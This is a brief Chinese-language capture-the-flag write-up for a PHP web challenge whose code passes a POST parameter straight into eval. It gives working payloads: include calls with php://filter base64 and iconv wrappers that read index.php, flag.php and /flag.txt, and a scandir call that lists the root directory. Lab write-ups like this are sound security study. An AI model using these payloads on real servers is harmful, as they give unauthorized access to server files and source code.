信息收集

highlight_file被禁用了，使用c=include("php://filter/convert.base64-encode/resource=index.php");讀取index.php，使用c=include("php://filter/convert.iconv.utf8.utf16/resource=index.php");可能有些亂碼，不好看

if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

解題

按照管理讀取flag.php

c=include("php://filter/convert.iconv.utf8.utf16/resource=flag.php");
c=include("php://filter/convert.base64-encode/resource=flag.php");

我這里為了不顯示亂碼，使用了base64編碼讀取，可惜，結果似乎不是很完整

照例讀目錄

c=var_dump(scandir('/'));

因為沒有標簽，不用擔心被標簽包含的被當做代碼執行了，所以直接include("/flag.txt")也是可以的

c=include("php://filter/convert.iconv.utf8.utf16/resource=/flag.txt");
c=include("php://filter/convert.base64-encode/resource=/flag.txt");
c=include("/flag.txt")

---

web67 ?? 目錄 ?? web69